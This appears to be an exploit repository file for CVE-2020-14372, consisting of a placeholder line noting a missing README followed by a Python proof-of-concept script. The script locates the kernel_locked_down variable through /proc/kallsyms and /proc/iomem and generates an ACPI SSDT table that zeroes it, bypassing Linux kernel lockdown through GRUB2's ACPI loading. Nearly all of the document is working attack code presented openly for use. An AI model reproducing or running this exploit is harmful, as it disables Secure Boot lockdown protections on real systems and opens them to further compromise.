README.md
README.md not found for CVE-2020-14372. The file may not exist in the repository.
#!/usr/bin/python3
# Universal Linux lockdown bypass, thanks GRUB2 <3
import os
import sys
# The Linux ACPI battery driver won't be able to resist running this :)
ssdt_code = """
DefinitionBlock ("trigger.aml", "SSDT", 2, "", "", 0x00001001)
{
OperationRegion (KMEM, SystemMemory, 0x%x, 4)
Field (KMEM, DWordAcc, NoLock, WriteAsZeros)
{
LKDN, 32
}
Device (\\_SB_.HACK)
{
Name(_HID, EisaId ("PNP0C0A"))
Name(_UID, 0x02)
Method(_INI)
{
If (LKDN)
{
LKDN = Zero
}
}
}
}
"""
# This only works as root
if os.getuid() != 0:
print("This script must be run as root!", file=sys.stderr)
exit(1)
# Make sure kernel ASLR is off
with open("/proc/cmdline") as f:
if "nokaslr" not in f.read():
print("Please add nokaslr to /etc/default/grub", file=sys.stderr)
exit(1)
# Get the kernel load address in physical address space
for line in open("/proc/iomem"):
if "Kernel code" in line:
kernel_base = int(line.split("-")[0].strip(), 16)
# Get the virtual address of kernel_locked_down
for line in open("/proc/kallsyms"):
if "kernel_locked_down" in line:
kernel_locked_down = int(line.split(" ")[0].strip(), 16)
# Calculate the physical address of kernel_locked_down
kernel_locked_down &= ~0xffffffff80000000
kernel_locked_down += (kernel_base - 0x01000000)
print(ssdt_code %kernel_locked_down)